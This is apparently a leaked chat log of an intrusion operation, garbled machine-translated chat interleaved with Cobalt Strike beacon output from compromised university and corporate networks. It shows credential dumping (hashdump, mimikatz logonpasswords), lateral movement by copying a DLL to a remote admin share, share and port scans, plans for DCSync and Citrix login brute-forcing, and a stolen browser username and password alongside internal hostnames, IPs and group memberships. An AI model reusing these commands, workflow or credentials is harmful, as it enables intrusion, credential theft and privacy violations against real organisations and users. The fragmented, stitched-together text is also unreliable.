 18600 804 cmd.exe x64 1 UNFCSD\N00865522
 26296 18600 conhost.exe x64 1 UNFCSD\N00865522
 26088 804 cmd.exe x64 1 UNFCSD\N00865522
 28580 26088 conhost.exe x64 1 UNFCSD\N00865522
 27996 804 cmd.exe x64 1 UNFCSD\N00865522
 22668 27996 conhost.exe x64 1 UNFCSD\N00865522
 28844 804 logonUI.exe
 30016 804 cmd.exe x64 1 UNFCSD\N00865522
 26120 30016 conhost.exe x64 1 UNFCSD\N00865522
 27504 30016 SharpShares.exe x64 1 UNFCSD\N00865522
 9352 9336 GoogleCrashHandler.exe
 9360 9336 GoogleCrashHandler64.exe
 10460 10384 igfxEM.exe x64 1 UNFCSD\N00865522
 10484 10384 igfxHK.exe x64 1 UNFCSD\N00865522
 10576 10384 igfxTray.exe x64 1 UNFCSD\N00865522
 10664 10588 explorer.exe x64 1 UNFCSD\N00865522
 4552 10664 CCXProcess.exe x64 1 UNFCSD\N00865522
 15200 4552 node.exe x64 1 UNFCSD\N00865522
 15212 15200 conhost.exe x64 1 UNFCSD\N00865522
 11216 10664 SecurityHealthSystray.exe x64 1 UNFCSD\N00865522
 13660 10664 OneDrive.exe x86 1 UNFCSD\N00865522
 13740 10664 hppfaxprintersrv.exe x64 1 UNFCSD\N00865522
 13844 10664 Apoint.exe x64 1 UNFCSD\N00865522
 13812 13844 ApMsgFwd.exe x64 1 UNFCSD\N00865522
 14420 13844 hidfind.exe x64 1 UNFCSD\N00865522
 13896 10664 Sophos UI.exe x64 1 UNFCSD\N00865522
 14052 10664 express.exe x86 1 UNFCSD\N00865522
 16652 14052 CefSharp.BrowserSubprocess.exe x86 1 UNFCSD\N00865522
 19908 10664 Zoom.exe x86 1 UNFCSD\N00865522
 12532 19908 Zoom.exe x86 1 UNFCSD\N00865522
 12848 3200 Teams.exe x86 1 UNFCSD\N00865522
 3324 12848 Teams.exe x86 1 UNFCSD\N00865522
 6696 12848 Teams.exe x86 1 UNFCSD\N00865522
 6844 12848 Teams.exe x86 1 UNFCSD\N00865522
 16964 12848 Teams.exe x86 1 UNFCSD\N00865522
 17508,12848 Teams.exe x86 1 UNFCSD\N00865522
 24584 12848 Teams.exe x86 1 UNFCSD\N00865522
 25340 12848 Teams.exe x86 1 UNFCSD\N00865522
 33028 12848 Teams.exe x86 1 UNFCSD\N00865522
 13132 8176 dllhost.exe
 14396 14864 EEventManager.exe x86 1 UNFCSD\N00865522
 14428 14412 ApntEx.exe x64 1 UNFCSD\N00865522
 14444 14428 conhost.exe x64 1 UNFCSD\N00865522
 14972 14864 iusb3mon.exe x86 1 UNFCSD\N00865522
 15260 14864 hpwuschd2.exe x86 1 UNFCSD\N00865522
 15280 14864 jusched.exe x86 1 UNFCSD\N00865522
 17696 15280 jucheck.exe x86 1 UNFCSD\N00865522
 15308 14864 Creative Cloud.exe x64 1 UNFCSD\N00865522
 15416 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
 15492 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
 16120 15308 Adobe Desktop Service.exe x86 1 UNFCSD\N00865522
 11900 16120 CoreSync.exe x86 1 UNFCSD\N00865522
 16764 16120 Creative Cloud Helper.exe x64 1 UNFCSD\N00865522
 17360 15308 AdobeIPCBroker.exe x86 1 UNFCSD\N00865522
 25664 15308 CCLibrary.exe x64 1 UNFCSD\N00865522
 27556 25664 node.exe x64 1 UNFCSD\N00865522
 15848 27556 conhost.exe x64 1 UNFCSD\N00865522
 27656 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
 28880 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
 22540 21392 Dropbox.exe x86 1 UNFCSD\N00865522
 17332 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522
 19912 22540 Dropbox.exe x86 1 UNFCSD\N00865522
 21868 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522
 21872 22540 Dropbox.exe x86 1 UNFCSD\N00865522
 22832 1772 acrotray.exe x86 1 UNFCSD\N00865522
 27932 51660 MicrosoftEdge_X64_87.0.664.52_87.0.664.47.exe
 51156 27932 setup.exe
 22624 51156 setup.exe
``COB-62001
```
 PID PPID Name Arch Session User
 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System x64 0
 56 4 Secure System x64 0 NT AUTHORITY\SYSTEM
 112 4 Registry x64 0 NT AUTHORITY\SYSTEM
 352 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 1768 4 Memory Compression x64 0 NT AUTHORITY\SYSTEM
 528 512 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 656 512 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 84 656 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0
 752 656 services.exe x64 0 NT AUTHORITY\SYSTEM
 552 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 940 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 980 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 1292 980 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1412 980 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 5832 1412 rundll32.exe x64 0 UNFCSD\n01447311
 4484 5832 cmd.exe x64 0 UNFCSD\n01447311
 1072 4484 timeout.exe x64 0 UNFCSD\n01447311
 4444 4484 conhost.exe x64 0 UNFCSD\n01447311
 2720 980 WmiPrvSE.exe x64 0 NT AUTHORITY\n0144311
 2724 980 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
 4844 980 WmiPrvSE.exe x64 0 NT AUTHORITY/\SYSTEM
 1088 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 1108 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1184 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1200 752 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 1268 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1296 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1356 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1452 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1500 752 atiesrxx.exe x64 0 NT AUTHORITY\SYSTEM
 3292 1500 atieclxx.exe x64 1 NT AUTHORITY\SYSTEM
 1548 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1556 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1564 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1572 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 1592 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1600 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1608 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1616 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1624 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1632 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1648 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1780 752 igfxCUIService.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1832 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1916 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 1956 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1968 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2024 752 CcmExec.exe x64 0 NT AUTHORITY\SYSTEM
 2128 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2136 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2164 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2208 752 svchost.exe x64 0 NT AUTHORITY/ LOCAL SERVICE
 2212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2224 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2256 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2380 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2492 752 svchost.exe x64 0 NT AUTHORITY/\LOCAL SERVICE
 2508 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2552 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2560 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2728 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 2764 752 SgrmBroker.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2788 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2896 752 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
 2920 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2984 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3024 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3028 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3076 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 3156 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3224 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 3320 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 3332 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3344 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 3372 752 MsMpEng.exe x64 0 NT AUTHORITY\SYSTEM
 3412 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 3492 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 3504 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3520 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
 3724 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 3904 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 3924 752 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
 4000 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 4068 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 4208 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 4336 752 securityHealthService.exe x64 0 NT AUTHORITY\SYSTEM
 4400 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 4788 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 4812 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5236 752 NisSrv.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 6044 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 820 656 lsaIso.exe x64 0 NT AUTHORITY\SYSTEM
 828 656 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 672 648 csrss.exe x64 1 NT AUTHORITY\SYSTEM
 760 648 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
 76 760 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1
 1064 760 logonUI.exe x64 1 NT AUTHORITY\SYSTEM
 1216 760 dwm.exe x64 1 Window Manager\DWM-1
``get the full list of processes here,``
only on 2 windows 10
``:thinking:but he has access to the admin ball or says that the current user is not LAELWAYS spam sessions without *she will try to do something about it about the current machine oddly shortly this user has admins only on 2 windas 10enterprice (empty), on 1 servak (current machine), the other 319 are Windows education, computers in the students, they have nothing to catch it and was going to do and tell me whether there is a server OS from the old list of hosts with admin balls turns out so that now we have that yesterday's polozak?i have no usernames and passwords at all and i started reshooting the ballsvirtually 20 minutes ago i restored it via Citrix as i came with it a session hung for 8 hours i wrote that polzak session or login / pass remained? no polzak the same? now i will download it again, yesterday you were from there selected hosts with admin balls? i mean the previous output list was not added more job just hung everything that has collected ```
[*] Parsed 7530 computer objects.
Shares for CONDORCLUSTER:
	[--- Unreadable Shares ---]
		ClusterStorage$
		IPC$

Shares for WILDCATNEW:
	[--- Unreadable Shares ---]
		IPC$

Shares for COB-62001:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for chem-62837:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ccdc Chalk Research Group's Public Folder Chalk, Stuart's Public Folder chembl COASAdmin's Public Folder donh's Public Folder ncct nistsdm trc
Shares for CEC-59126:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ E$ F$ K$ print$
Shares for WILDCAT:
	[--- Unreadable Shares ---]
		IPC$

Shares for Coppicecluster:
	[--- Unreadable Shares ---]
		ClusterStorage$
		IPC$

Shares for ThicketA:
	[--- Unreadable Shares ---]
		IPC$

Shares for primrose:
	[--- Unreadable Shares ---]
		IPC$

Shares for hedgea:
	[--- Unreadable Shares ---]
		IPC$

Shares for ThicketB:
	[--- Unreadable Shares ---]
		IPC$

Shares for BriarA:
	[--- Unreadable Shares ---]
		IPC$

Shares for ThicketC:
	[--- Unreadable Shares ---]
		IPC$

Shares for PHYS-65427:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65428:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65430:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-63941:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65439:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65440:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65435:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65438:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-63945:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65433:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65437:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-63943:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65432:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65442:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-63947:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHYS-65441:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for PHYS-65436:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for thicketd:
	[--- Unreadable Shares ---]
		IPC$

Shares for ThicketE:
	[--- Unreadable Shares ---]
		IPC$

Shares for CEC-66268:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ Users
Shares for PHL-66859:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for CEC-63643:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for PHL-66860:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66886:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66897:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66872:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66891:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66868:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66865:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66866:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66882:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66885:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66884:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for PHL-66892:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66368:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66375:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66373:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66382:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66400:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66377:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66381:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66394:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66385:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66396:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66397:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66384:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66392:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66401:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66386:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66399:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for ITST-66393:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for mus-63011:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		Administrator's Public Folder Biernacki, Krzysztof's Public Folder Daugherty, John's Public Folder Hines, Clarence's Public Folder Pavlesich, Adina's Public Folder Studio Lessons's Public Folder n00865522

``Give me the whole list of npc with admin balls under the current polzacompletion on another machine in another give out but this again only in this session
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
[-] no results.
``hashdump with minus comes out but computer itself seems to be neutered in one way or another, i.e. there is output, etc.
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 438866 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
```
```
beacon> jobs
[*] Tasked beacon to list jobs
[+] host called home, sent: 8 bytes
[*] Jobs

 JID PID Description
 --- --- -----------
 17 12304 process
```
```
beacon> shell copy x64.dll \139.62.66.77\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\139.62.66.77\C$\ProgramData
[+] host called home, sent: 73 bytes
```
```
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is CA3E-DD31

 Directory of C:\ProgramData

12/02/2020 04:31 AM <DIR> %LOCALAPPDATA%
12/01/2020 04:27 PM 272 2013.par
04/07/2018 11:09 AM 35,888 3002.abs
05/02/2015 07:50 PM 15,568 3029.abs
11/11/2019 05:42 PM <DIR> ABBYY
10/12/2020 01:43 PM <DIR> Adobe
11/20/2020 09:32 AM <DIR>
``Certainly in the session from which I could not push the dailka to other computers, mimic worked with an error, google pinged, tht with the balls through the shell type output in this output is, but not from all previous after the adfynda first did not work, then broke, it feels like the response was just 10 minutes, although Hartbit about 3-5 seconds were you in both kobs in bicon output does not fly from the network?but i'm talking specifically about the current network, the scanners are not sleeping in the new one, which is wikibros.com, today came a lot of left-handed sessions
the previous one, which is likenic.com, went in yesterday and there were a bunch of sessions of 500-800 hours of slack I gave you the additional koba you have in both koba such anomaly arrives? by the waykoba in bl got 90%) did not come to me understood I made a case in an existing session there is a host calls home, but no output in bicon?
 in short, from that session, the call to the other computers didn't work
```
there is no output not working and i can't copy it, i can't copy from that session, i just went back to Citrix and saved myself yesterday's starting session, i'm reshooting the balloons just in case, there will be more, and i can spam, waiting until one has 10 unterricks mainly windows 10 unitedcation as yesterday i have access to windows 10 unitedcation, made style token, injected into user's process, session either does not appear, or appears stillborn@tl1 so you fix it since there are system sessionsIn general, the session where there was a user I jumped out, the system remains, there is another user, now I will jump into his process and will watch the balls againl then dsync hereDCSYNC removed; looking for cloud-administration of Webroot SecureAnywhere in the spn is` >servicePrincipalName: exchangeAB/JDODC67.jdossn.local` - it is pinged. What to do with it? in ad_users there is something like ` smtp:NHNorRAremb@jdisonline.com` but `jdisonline.com` is not resolved google, hotmail, yahoo, etc.in browsers they have public servicesseka also if you took off the browsers where they have mail? or in spns can be written exchangemailEX also?  =)no one with a name that has `exc` I'll check and you see the exh server? it's a pinged list of servers and how to find it? from where i am, most of them don't seem to be visible at all did you scan the diapasons? the webserver that holds citrix authorization is VERY often not in the domain i check this list via dirb``.
[+] 172.31.45.14: - 172.31.45.14:80 - TCP OPEN
[+] 10.99.202.247: - 10.99.202.247:80 - TCP OPEN
[+] 10.99.205.75: - 10.99.205.75:80 - TCP OPEN
[+] 10.99.195.11: - 10.99.195.11:443 - TCP OPEN
[+] 10.99.202.247: - 10.99.202.247:443 - TCP OPEN
[+] 172.31.190.157: - 172.31.190.157:443 - TCP OPEN
[+] 10.99.198.60: - 10.99.198.60:443 - TCP OPEN
[+] 10.99.193.18: - 10.99.193.18:443 - TCP OPEN
[+] 10.99.198.60: - 10.99.198.60:80 - TCP OPEN
[+] 172.31.45.15: - 172.31.45.15:80 - TCP OPEN
[+] 10.99.205.75: - 10.99.205.75:443 - TCP OPEN
[+] 10.99.202.181:        - 10.99.202.181:443 - TCP OPEN
[+] 10.99.201.43: - 10.99.201.43:443 - TCP OPEN
[+] 10.99.193.24: - 10.99.193.24:443 - TCP OPEN
[+] 10.99.193.24: - 10.99.193.24:80 - TCP OPEN
[+] 10.99.201.43: - 10.99.201.43:80 - TCP OPEN
[+] 172.31.45.20: - 172.31.45.20:80 - TCP OPEN
[+] 10.99.193.18: - 10.99.193.18:80 - TCP OPEN
it's not necessary that you just have a direct redirect from the host on the port which under soks can pro brute-force the right way look there are such utilitiesdirb / dirbusThen yes. I understand it is a local hostname or address I did not specify an external domain is on the local I suggest to check not, in amazon 2FA. I check on the local I do not think that climb in amazon worth vobshek as I pinyal, they used to have their citrix - after him left a certain number of servers. Now they're in the cloud on amazon. And it looks like it's not their Citrix, but John Deere's, and it has ldap authorization bolted on to it. I'm looking on their local servers now - maybe there's something left...take all the hosts that open on port 80/443
Run a dirbuster on the format

https://hostname/vpn/index.html
or at
https://ipaddr/vpn/index.html``
https://*domain.com/vpn/index.html
```
here's the default path to the citrix login.
i'm a little confused maybe...but why citrixxpreselect all live servers with a hint of citrix in the name or descriptionwhat i'm trying here i found that it is not login but cgi/loginda. and http and https https added? the name of the computer does not have to = server name login - also self come here https://....../login so go to the name is about that, the name might show something ... 80 is the same and tcheck 80 and 443 ports can be specified by name or by name it is a separate configuration block access by ipdalfnu htrs. for example nginx if configured - it gives by name, but by ip on 404 blameduethe scheme http(s) why? well, within the domain that just a web server can not give anything when accessing ipsysteminfo, ipconfiglocal - what? and then how can all the local DNS to rent? what is available and local.here's another question - there are Citrix Delivery Controllers, there is Citrix Director probably something else is it. I have what to look for? as an option to prescribe in the hosts domain to the local ip Citrixshekas will trynu yes, just log in that will be by IP - auto redirect will not work443 80the same web admin port) port what citrix? 80????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
beacon> portscan 3.15.36.195 80,443 icmp 2
[*] Tasked beacon to scan ports 80,443 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``Yeah, ldap is probably connected but I don't think it's part of the domain then 80 and 443`` ``
beacon> shell ping signon.jdisonline.com
[*] Tasked beacon to run: ping signon.jdisonline.com
[+] host called home, sent: 57 bytes
[+] received output:

Pinging ok11-crtr-custom-domains-cd76c2bd4d92725a.elb.us-east-2.amazonaws.com [3.15.36.195] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.

[+] received output:
Request timed out.

Ping statistics for 3.15.36.195:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

beacon> portscan 3.15.36.195 445,139 icmp 2
[*] Tasked beacon to scan ports 445,139 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``Can you see ports 445,139 445? ping what? if citrix, amazon. but samaccountname from local domain is specified in settings? their servers may be on amazon in some strange place. but it seems they have different settings. two of them ask for 2FA when they login and one of them asks for 2FA when they change their settings here too ``.
--- Chromium Credential (User: ndmicjsater) ---
URL : https://jdoapps.jdisonline.com/cgi/login
Username : ndmicjsater
Password : NDleading22

Is it okay if it's their server or not? It looks like they dragged the Citrix servers to amazom. is that okay?
>memberOf: CN=NDLEADING_Citrix_Local_Drives,
``Then take down the browsers where you can and look for citrixstrannotut and the usual polzacs no more. and the AD_comp `34648 Objects returned`` external?
UserName : jdodmp_svc
ComputerName : JDODC67.jdossn.local
SessionFrom : 204.54.154.136
SessionFromName : JDODMP03.jdossn.local
LocalAdmin : False
they are not in this subnet and can't see them from here (so go to the DAE PC and take their hash off) practically. on the DAE does not let in all? and not the servers does not let in. on the user PCs the same LA, so you only go to the user PCs? i dont remember, i think i checked. i don't remember. i think i checked it again.
>uSNCreated: 63484
>memberOf: CN=NDLEADING_DPARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_PARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Citrix_Local_Drives,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_SDK_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Technicians,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Schedulers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Managers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Reports_Drive,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPRDB-ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPPatch_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Dealer_Portal_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
